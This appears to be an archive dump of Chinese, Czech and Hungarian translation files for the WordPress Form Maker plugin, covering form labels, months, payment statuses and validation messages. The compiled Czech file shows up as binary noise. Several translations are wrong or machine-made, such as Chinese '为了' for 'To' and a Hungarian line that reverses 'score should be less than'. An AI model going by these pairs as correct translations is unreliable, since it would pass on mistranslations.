#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "你的分数应小于 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "标题"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "第一"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Last"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "中间名"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "区域码"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "电话号码"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "美元"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "美分"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "从"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "为了"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "去 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "重置"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "选择一个字段 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "选择日期"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-cs_CZ.mo000060400000007203152434416630012176 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
T
Z
b
i
o
x
�
%�
'�
�
�
�
�
	
	&.	6@U^fy��
�
��>�$4%8N^%��� �H�*G
&r
!�
*�
H�
(/Xj4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:51+0400
PO-Revision-Date: 2015-05-22 16:51+0400
Last-Translator: 
Language-Team: 
Language: cs
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
DubenKód oblastiSrpencentů MěstoZeměProsinecdolarů Chyba, byl e-mail neposlal.Chyba může soubor nelze přesunout.Chyba, nesprávný bezpečnostní kód.ÚnorZa prvéod jít LedenČervenecČervenPosledníBřezenKvětenna středNic byl předložen.ListopadŘíjenTelefonní čísloPoštovní / PSČmnožství Obnovit Vyberte datumVyberte pole ZáříJe nám líto, ale nemáte možnost nahrát tento typ souboru.Stát / provincie / RegionUliceUlice řádek 2TheSouboru přesáhne povolenou velikostToto pole %s vyžaduje jedinečný přístup a tato hodnota byla již podána.Toto není platná e-mailová adresa.NázevnaOvěřovací odkaz je neplatný.Nemůžete vybrat bývalé termín. Vyberte datum počínaje aktuální.Vaše e-mailová adresa je již ověřena.Váš e-mail byl úspěšně ověřen.Váš e-mail ověření vypršel.Váš formulář byl úspěšně odeslán.Vaše IP je na černé listině. Prosím, obraťte se na správce webu. Vaše skóre by měla být menší než pole je povinné.hodnota musí být mezi languages/form_maker-hu_HU.po000060400000057112152434416630012214 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:57+0400\n"
"PO-Revision-Date: 2015-05-22 16:57+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: hu\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Utca, házszám"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Utca, házszám, 2. sor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Város "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Állam / Tartomány / Régió"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Ország "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Január "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Február "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Március "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Április "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Május "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Június "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Július "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Augusztus "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Szeptember "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Október "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "December "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Hiba, hibás biztonsági kódot."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Az ip feketelistára. Lépjen kapcsolatba a webhely adminisztrátorának. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "A fájl mérete meghaladja a megengedett méretét"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Sajnálom, akkor nem tölthet fel ezt a fájltípust."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Hiba, a fájl nem lehet mozgatni."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Ebben a mezőben %s igényli egyedülálló bejegyzés és ezt az értéket már "
"benyújtották."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Hiba, e-mail nem lett elküldve."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Semmi sem nyújtottak be."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "A forma sikeresen be."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Hiba, e-mail nem lett elküldve."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Az Ön e-mail cím már ellenőrizte."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Az Ön e-mail sikeresen ellenőrizte."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Az Ön e-mail ellenőrző időkorlátja."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Írja be a képen link érvénytelen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "mező kitöltése kötelező."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ez nem egy érvényes e-mail címet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Nem tudja kiválasztani egykori tizenegy óra. Válasszon ki egy dátumot kezdve "
"a jelenlegi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "érték között kell lennie "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Mennyiség "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "A pontszám nem lehet kisebb, mint a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Cím"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Első"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Utolsó"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Középső"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Körzetszám"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefonszám"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollár "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cent "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "-től"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
